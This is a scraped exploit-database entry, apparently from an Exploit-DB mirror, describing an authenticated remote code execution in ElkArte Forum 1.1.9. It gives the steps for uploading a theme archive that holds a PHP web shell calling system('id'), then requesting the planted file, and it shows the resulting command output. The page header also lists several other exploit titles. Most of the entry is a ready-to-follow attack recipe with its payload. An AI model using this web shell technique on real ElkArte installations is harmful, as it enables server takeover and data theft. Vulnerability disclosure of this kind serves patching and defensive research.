3ac07794c9
7 changes to exploits/shellcodes/ghdb Aquatronica Control System 5.1.6 - Information Disclosure Check Point Security Gateway - Information Disclosure (Unauthenticated) changedetection < 0.45.20 - Remote Code Execution (RCE) BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) iMLog < 1.307 - Persistent Cross Site Scripting (XSS)
13 lines
No EOL
784 B
Text
13 lines
No EOL
784 B
Text
# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 2024-5-24
|
|
# Exploit Author: tmrswrr
|
|
# Category: Webapps
|
|
# Vendor Homepage: https://www.elkarte.net/
|
|
# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip
|
|
# Version : 1.1.9
|
|
|
|
|
|
1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m
|
|
2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>
|
|
3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php
|
|
Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) |